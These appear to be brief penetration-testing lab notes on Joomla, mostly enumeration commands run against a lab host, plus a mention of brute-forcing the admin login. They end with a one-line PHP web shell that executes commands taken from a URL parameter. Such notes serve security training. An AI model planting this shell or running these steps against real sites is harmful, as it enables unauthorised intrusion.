Joomla Attacks

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

curl -s http://dev.inlanefreight.local/ | grep Joomla

curl -s http://dev.inlanefreight.local/README.txt | head -n 5

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

curl -s http://app.inlanefreight.local/plugins/system/cache/cache.xml | xmllint --format -

sudo pip3 install droopescan

droopescan -h

droopescan scan joomla --url http://dev.inlanefreight.local/

We can also try out JoomlaScan, which is a Python tool inspired by the now-defunct OWASP joomscan tool.

sudo python2.7 -m pip install urllib3

sudo python2.7 -m pip install certifi

sudo python2.7 -m pip install bs4

python2.7 joomlascan.py -u http://dev.inlanefreight.local

The default administrator account on Joomla installs is admin,
- but the password is set at install time
We can use this script to attempt to brute force the login.

Attacking Joomla

system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

Last updated 1 year ago